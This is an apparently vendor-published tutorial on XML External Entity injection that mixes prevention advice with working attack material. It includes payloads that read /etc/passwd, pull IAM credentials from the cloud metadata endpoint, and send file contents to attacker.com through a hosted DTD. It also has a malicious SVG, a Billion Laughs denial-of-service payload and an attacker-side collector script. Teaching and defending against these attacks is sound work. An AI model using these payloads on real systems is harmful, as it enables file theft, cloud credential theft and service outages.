What is XML External Entity (XXE) Injection? Ways to Exploit, Examples and Impact

Learn what XXE injection is, how to exploit it with payloads, and how to prevent it. A comprehensive guide for cybersecurity beginners and professionals.

XML External Entity (XXE) injection is a critical web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server's filesystem and to interact with any back-end or external systems that the application itself can access. In some situations, an attacker can escalate an XXE vulnerability into a compromise of the underlying server or other back-end infrastructure, for example by using it to perform server-side request forgery (SSRF) attacks.

In this guide, we will dive deep into the technical mechanics of XXE, explore various exploitation techniques with concrete examples, and discuss how you can secure your infrastructure against these threats. Whether you are a developer looking to write safer code or a security enthusiast learning the ropes, understanding XXE is a fundamental step in mastering modern web security.

What is XML and Why is it Vulnerable?

To understand XXE, we first need to understand XML (eXtensible Markup Language). XML is a popular format for storing and transporting data. Unlike HTML, which is designed to display data, XML is designed to carry data in a structured way. Many web applications use XML to communicate between the client and the server, or between different internal services.

The Role of DTDs (Document Type Definitions)

The vulnerability arises from a feature of the XML specification called Document Type Definitions (DTD). A DTD contains declarations that can define the structure of an XML document, the types of data values it can contain, and more. One specific feature of DTDs is the ability to define XML entities.

Understanding XML Entities

Think of an XML entity as a variable. You define it once in the DTD and then reference it throughout the XML document. There are two main types of entities:

Internal Entities: These are defined within the DTD itself. For example:

<!DOCTYPE note [
  <!ENTITY myName "Jsmon User">
]>
<note>
  <author>&myName;</author>
</note>

When the XML parser processes this, &myName; is replaced with "Jsmon User".

External Entities: These are defined using a system identifier (the SYSTEM keyword followed by a URL or file path), which tells the XML parser to fetch the content from an external source. A parser that resolves such entities is the root cause of XXE injection. For example:

<!DOCTYPE note [
  <!ENTITY externalData SYSTEM "http://attacker.com/data.txt">
]>
<note>
  <content>&externalData;</content>
</note>

If an application takes user-supplied XML and parses it with a poorly configured XML parser that resolves these external entities, an attacker can point the SYSTEM identifier to sensitive local files or internal network resources.
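To see entity substitution in action without touching any files, the sketch below feeds the internal-entity example to Python's standard-library xml.etree.ElementTree, which expands entities declared in the document's own DTD. The helper name author_of is purely illustrative.

```python
import xml.etree.ElementTree as ET

# The internal-entity document from above, verbatim.
NOTE = """<!DOCTYPE note [
  <!ENTITY myName "Jsmon User">
]>
<note>
  <author>&myName;</author>
</note>"""


def author_of(xml_text: str) -> str:
    """Parse the note and return the <author> text after entity expansion."""
    root = ET.fromstring(xml_text)
    # By the time we see the tree, &myName; has already been replaced by its value.
    return root.findtext("author")


print(author_of(NOTE))  # Jsmon User
```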

How to Exploit XXE: Practical Examples

Exploiting XXE depends on how the application processes the XML and what output is returned to the user. Here are the most common exploitation scenarios.

1. Retrieving Local Files (In-band XXE)

This is the most straightforward form of XXE. An attacker modifies the XML sent to the server to include an external entity that points to a sensitive file on the server's filesystem, such as /etc/passwd on Linux or C:\Windows\win.ini on Windows.

Original Request:

POST /stockCheck HTTP/1.1
Content-Type: application/xml

<stockCheck>
    <productId>123</productId>
</stockCheck>

Malicious XXE Payload:

POST /stockCheck HTTP/1.1
Content-Type: application/xml

<!DOCTYPE test [ 
  <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
]>
<stockCheck>
    <productId>&xxe;</productId>
</stockCheck>

If the application displays the productId back to the user in the response, the content of /etc/passwd will be rendered in the browser or API response. This allows the attacker to map out users, service accounts, and system configurations.
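To see the in-band case end to end without attacking anything real, the sketch below plays both sides in a local Python lab. Python's standard-library SAX parser has not resolved external entities by default since Python 3.7.1, so the code deliberately re-enables feature_external_ges to stand in for a misconfigured server. vulnerable_stock_check, ProductIdCollector, and the temporary passwd file are hypothetical stand-ins for the application and /etc/passwd. Never enable this feature for untrusted input.

```python
import io
import pathlib
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class ProductIdCollector(ContentHandler):
    """Collects the text a stock-check endpoint would echo back for <productId>."""

    def __init__(self):
        super().__init__()
        self.in_product_id = False
        self.product_id = ""

    def startElement(self, name, attrs):
        self.in_product_id = name == "productId"

    def endElement(self, name):
        if name == "productId":
            self.in_product_id = False

    def characters(self, content):
        if self.in_product_id:
            self.product_id += content


def vulnerable_stock_check(body: bytes) -> str:
    """Hypothetical endpoint: parses the body and returns productId verbatim."""
    parser = xml.sax.make_parser()
    # Deliberate misconfiguration for the lab: resolve external general entities.
    parser.setFeature(feature_external_ges, True)
    handler = ProductIdCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(body))
    return handler.product_id


# Lab setup: a stand-in for /etc/passwd inside a fresh temporary directory.
lab_dir = pathlib.Path(tempfile.mkdtemp())
secret = lab_dir / "passwd"
secret.write_text("root:x:0:0:root:/root:/bin/bash")

# Same shape as the malicious request above, pointed at the lab file.
payload = f"""<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "{secret.as_uri()}">
]>
<stockCheck>
    <productId>&xxe;</productId>
</stockCheck>""".encode()

print(vulnerable_stock_check(payload))  # echoes the contents of the lab file
```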

2. Exploiting XXE to Perform SSRF

Server-Side Request Forgery (SSRF) occurs when an attacker can induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. In an XXE context, this is done by pointing the external entity to a URL instead of a file.

SSRF Payload for Internal Metadata:

<!DOCTYPE test [ 
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"> 
]>
<stockCheck>
    <productId>&xxe;</productId>
</stockCheck>

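In cloud environments such as AWS, 169.254.169.254 is a link-local address that serves instance metadata. By exploiting XXE, an attacker could retrieve the temporary IAM credentials of the role attached to the instance and gain whatever cloud permissions that role holds, which for an over-privileged role can mean broad access to the organization's infrastructure. Enforcing IMDSv2, which requires a session token obtained through a PUT request with a custom header, prevents this simple GET-based technique. This highlights why monitoring your attack surface with Jsmon is critical for identifying these hidden entry points.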
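Because the server-side parser, not the attacker, issues the request, the SSRF step can be observed without any network traffic by intercepting entity resolution. This Python sketch again re-enables the SAX external-entity feature to mimic a vulnerable server, but installs a hypothetical RecordingResolver that logs every system identifier the parser asks for and answers with canned placeholder bytes instead of contacting 169.254.169.254. The fake JSON is illustrative only and is not the real shape of a metadata response.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

METADATA_URL = "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"
FAKE_RESPONSE = b'{"AccessKeyId": "EXAMPLE", "Token": "EXAMPLE"}'  # placeholder, not real data


class RecordingResolver(EntityResolver):
    """Logs every URL the parser tries to fetch and answers with canned bytes."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(FAKE_RESPONSE))  # no network access happens
        return source


class TextCollector(ContentHandler):
    """Accumulates all character data, i.e. what the server would echo back."""

    def __init__(self):
        super().__init__()
        self.text = ""

    def characters(self, content):
        self.text += content


payload = f"""<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "{METADATA_URL}">
]>
<stockCheck><productId>&xxe;</productId></stockCheck>""".encode()

resolver, collector = RecordingResolver(), TextCollector()
parser = xml.sax.make_parser()
parser.setFeature(feature_external_ges, True)  # mimic the vulnerable server
parser.setEntityResolver(resolver)
parser.setContentHandler(collector)
parser.parse(io.BytesIO(payload))

print(resolver.requested)  # the internal URL the server would have requested
print(collector.text)      # the (fake) response that would be reflected
```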

3. Blind XXE (Out-of-Band Data Exfiltration)

Sometimes, the application does not return the value of any defined entities in its response. This is known as Blind XXE. To exploit this, attackers use "Out-of-Band" (OOB) techniques. They force the server to make a request to a server they control, appending the sensitive data as a URL parameter.

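This usually requires an external DTD hosted on the attacker's server. The payload relies on parameter entities (declared with % and referenced as %name;), which can only be used inside a DTD, and the XML specification forbids referencing a parameter entity inside another markup declaration in the internal DTD subset. Defining one entity in terms of another, as the eval entity does below, therefore only works in an external DTD.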

Attacker's hosted file (malicious.dtd):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;

Payload sent to victim:

<!DOCTYPE test [
  <!ENTITY % remote SYSTEM "http://attacker.com/malicious.dtd">
  %remote;
]>
<stockCheck><productId>1</productId></stockCheck>

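In this scenario, the victim server fetches malicious.dtd, which reads /etc/hostname into the file entity. Because &#x25; is a character reference for %, expanding eval declares a new parameter entity, exfiltrate, whose URL embeds the file's contents; referencing %exfiltrate; then makes the server send that value to the attacker's web logs in a GET request.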
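On the attacker's side, the "web logs" can be as simple as an HTTP listener that records the data query parameter. This is a minimal Python sketch using only the standard library; the handler, the start_collector helper, and listening on 127.0.0.1 with an ephemeral port for local testing are assumptions for illustration, while the data parameter name matches malicious.dtd above.

```python
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit

captured: list[str] = []  # values received in the ?data= parameter


class CollectorHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlsplit(self.path).query)
        captured.extend(query.get("data", []))
        self.send_response(204)  # no body needed; the request itself is the signal
        self.end_headers()

    def log_message(self, format, *args):
        pass  # silence the default stderr access log


def start_collector(host: str = "127.0.0.1", port: int = 0) -> HTTPServer:
    """Start the listener in a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), CollectorHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    server = start_collector()
    port = server.server_address[1]
    # Simulate the victim's request; ProxyHandler({}) bypasses any proxy settings.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    opener.open(f"http://127.0.0.1:{port}/?data=web-01").close()
    print(captured)  # ['web-01']
    server.shutdown()
    server.server_close()
```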

Advanced XXE Attack Vectors

XXE isn't always found in simple POST bodies. Because XML is a ubiquitous format, it can hide in various file types and protocols.

XXE via File Uploads (SVG and Office Docs)

Many modern file formats are XML under the hood. Office Open XML documents (.docx, .xlsx, and .pptx) are ZIP archives of XML files, and .svg (Scalable Vector Graphics) images are plain XML documents. If an application allows users to upload an SVG and then processes it on the server (e.g., to resize it or convert it to a PNG), it might be vulnerable to XXE.

Malicious SVG Example:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" >
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

If the server renders this SVG, the resulting image might contain the server's hostname text.
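On the defensive side, an upload pipeline can refuse any SVG or Office file whose XML declares a DOCTYPE before a renderer or converter ever sees it, the same policy Java's disallow-doctype-decl feature enforces. The Python sketch below uses the standard library's pyexpat and aborts as soon as StartDoctypeDeclHandler fires, so entities are never resolved. The function names are hypothetical, and scanning only .xml and .rels members is an assumption about how Office Open XML packages are laid out. Malformed XML raises ExpatError, which callers should treat as a rejection too.

```python
import io
import xml.parsers.expat
import zipfile


class DoctypeFound(Exception):
    """Raised from the parser callback as soon as a <!DOCTYPE ...> appears."""


def has_doctype(xml_bytes: bytes) -> bool:
    """True if the document declares a DOCTYPE; entities are never resolved."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeFound(name)  # abort before the DTD is processed

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(xml_bytes, True)  # may raise ExpatError on malformed input
    except DoctypeFound:
        return True
    return False


def upload_has_doctype(data: bytes) -> bool:
    """Check an uploaded SVG, or every XML part of a ZIP-based Office file."""
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return any(
                has_doctype(archive.read(name))
                for name in archive.namelist()
                if name.endswith((".xml", ".rels"))
            )
    return has_doctype(data)
```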

The "Billion Laughs" Attack (DoS)

While most XXE discussions focus on data theft, entity processing can also be abused for Denial of Service (DoS). The "Billion Laughs" attack uses nested internal entities (so, strictly speaking, no external entity is involved) to cause an exponential expansion of data in the server's memory, eventually crashing the process.

<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!-- ... and so on until lol9 ... -->
]>
<lolz>&lol9;</lolz>

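Each level multiplies the size by ten, so &lol9; expands to a billion (10^9) copies of "lol", roughly 3 GB of text, from a payload well under a kilobyte. On parsers that impose no expansion limits, this exhausts server RAM.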
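The arithmetic behind that figure can be checked without detonating anything. This Python sketch (helper names are hypothetical) builds the classic entity table, continuing the same ten-fold pattern through lol9, and computes the expanded length of &lol9; by summing lengths recursively instead of materializing the string.

```python
import re

ENTITY_REF = re.compile(r"&(\w+);")


def billion_laughs_entities(levels: int = 9, fanout: int = 10) -> dict[str, str]:
    """lol, then lol1..lolN, each made of `fanout` references to the previous one."""
    entities = {"lol": "lol"}
    previous = "lol"
    for level in range(1, levels + 1):
        name = f"lol{level}"
        entities[name] = f"&{previous};" * fanout
        previous = name
    return entities


def expanded_length(entities: dict[str, str], name: str) -> int:
    """Length of the fully expanded entity, computed without building the string."""
    memo: dict[str, int] = {}

    def length(entity: str) -> int:
        if entity not in memo:
            value = entities[entity]
            literal_chars = len(ENTITY_REF.sub("", value))
            memo[entity] = literal_chars + sum(length(ref) for ref in ENTITY_REF.findall(value))
        return memo[entity]

    return length(name)


def declarations_size(entities: dict[str, str]) -> int:
    """Characters needed to declare every entity (ASCII, so characters == bytes)."""
    return sum(len(f'<!ENTITY {name} "{value}">') for name, value in entities.items())


table = billion_laughs_entities()
print(declarations_size(table))        # 702
print(expanded_length(table, "lol9"))  # 3000000000
```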

The Real-World Impact of XXE

The impact of XXE can range from minor information disclosure to full system compromise. The primary risks include:

  • Confidentiality Breach: Accessing sensitive files like configuration files, source code, or credentials.
  • Internal Network Mapping: Using the server as a pivot point to scan internal ports and services that are not exposed to the public internet.
  • Cloud Credential Theft: Accessing metadata services to steal temporary security tokens.
  • Denial of Service: Crashing the application or the entire server through resource exhaustion.

Because XML is often used in legacy systems and complex enterprise integrations, XXE vulnerabilities can remain hidden for years. This is why continuous reconnaissance with tools like Jsmon is vital for maintaining a strong security posture.

How to Prevent XXE Injection

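The most effective way to prevent XXE is to disable DTD processing entirely in your XML parsing library, which also removes external entities. Some parsers still resolve external entities by default for backward compatibility (Java's built-in JAXP parsers are a common example), so you must explicitly turn these features off rather than trusting the defaults.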

Prevention in Java (DocumentBuilderFactory)

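import javax.xml.parsers.DocumentBuilderFactory;

// Note: setFeature() throws ParserConfigurationException if the parser does not support a feature
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

// Preferred: reject any document that contains a DOCTYPE declaration
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

// If you cannot disable DTDs entirely, disable external entities and external DTDs instead
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);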

Prevention in Python (lxml)

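from lxml import etree

xml_data = b"<stockCheck><productId>123</productId></stockCheck>"  # untrusted input

# Do not substitute entities, never load external DTDs, and block network access
parser = etree.XMLParser(resolve_entities=False, load_dtd=False, no_network=True)
root = etree.fromstring(xml_data, parser=parser)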
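If you rely on Python's standard library instead of lxml, the Python documentation states that xml.etree.ElementTree does not expand external entities and raises ParseError when one occurs. A minimal sketch of a wrapper that turns that behavior into an explicit rejection (parse_untrusted is a hypothetical name):

```python
import xml.etree.ElementTree as ET

# The in-band payload from earlier in this guide.
XXE_PAYLOAD = """<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
    <productId>&xxe;</productId>
</stockCheck>"""


def parse_untrusted(xml_text: str) -> ET.Element:
    """Parse untrusted XML with ElementTree, which never fetches external entities."""
    try:
        return ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # A reference to an external entity surfaces here as a parse error.
        raise ValueError(f"rejected untrusted XML: {exc}") from exc
```

ElementTree still expands internal entities; the Python documentation notes that Expat 2.4.1 and newer guards against billion-laughs payloads, and xml.parsers.expat.EXPAT_VERSION reports which version your interpreter uses.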

Prevention in PHP (libxml)

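Since PHP 8.0 (which requires libxml 2.9 or later), external entities are not loaded by default and libxml_disable_entity_loader() is deprecated; the global switch only matters on older versions.

if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true); // legacy PHP only: block external entity loading globally
}
// Never pass LIBXML_NOENT or LIBXML_DTDLOAD for untrusted input; LIBXML_NONET blocks network access
$xml = simplexml_load_string($xml_string, 'SimpleXMLElement', LIBXML_NONET);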

General Best Practices

  1. Use Safer Data Formats: If possible, switch to JSON or other formats that do not support complex features like DTDs.
  2. Keep Libraries Updated: Ensure your XML parsing libraries are patched to the latest versions.
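  3. Input Validation: Implement a "deny-list" for dangerous keywords like SYSTEM, PUBLIC, and ENTITY in XML inputs. Treat this only as a supplementary layer: attackers can often slip past keyword filters (for example, by changing the document's character encoding), so it is far less reliable than disabling DTDs.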
  4. Least Privilege: Run your application with the minimum necessary filesystem permissions so that even if an XXE exists, the attacker cannot read sensitive files like /etc/shadow.
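To see why keyword deny-lists are fragile, take the in-band payload and re-encode it as UTF-16: a byte-level search for SYSTEM no longer matches, yet an XML parser decodes the document and still sees the external entity declaration. The Python sketch below shows this with pyexpat's EntityDeclHandler, which only reports the declaration and fetches nothing; naive_filter is a hypothetical filter written for this demonstration.

```python
import xml.parsers.expat

PAYLOAD = """<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck><productId>&xxe;</productId></stockCheck>"""


def naive_filter(raw: bytes) -> bool:
    """Hypothetical deny-list: allow only if no dangerous keyword appears as ASCII bytes."""
    return not any(word in raw for word in (b"SYSTEM", b"PUBLIC", b"ENTITY"))


def declared_external_entities(raw: bytes) -> list[tuple[str, str]]:
    """Return (name, system_id) for every external entity the parser sees.

    pyexpat only reports the declaration here; with no ExternalEntityRefHandler
    set, it never fetches the URL.
    """
    found = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:
            found.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(raw, True)
    return found


utf16 = PAYLOAD.encode("utf-16")  # str.encode adds a byte-order mark
print(naive_filter(PAYLOAD.encode("utf-8")))  # False: blocked
print(naive_filter(utf16))                    # True: slips through
print(declared_external_entities(utf16))      # [('xxe', 'file:///etc/passwd')]
```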

Conclusion

XML External Entity (XXE) injection remains one of the most prevalent and dangerous vulnerabilities in the web landscape. By understanding how DTDs and external entities work, developers can take proactive steps to harden their applications. From simple file retrieval to complex out-of-band exfiltration and SSRF, the versatility of XXE makes it a favorite for attackers.

Securing your application requires a combination of secure coding practices, regular dependency updates, and robust infrastructure monitoring. By disabling DTD processing and following the principle of least privilege, you can effectively neutralize this threat.

To proactively monitor your organization's external attack surface and catch exposures before attackers do, try Jsmon.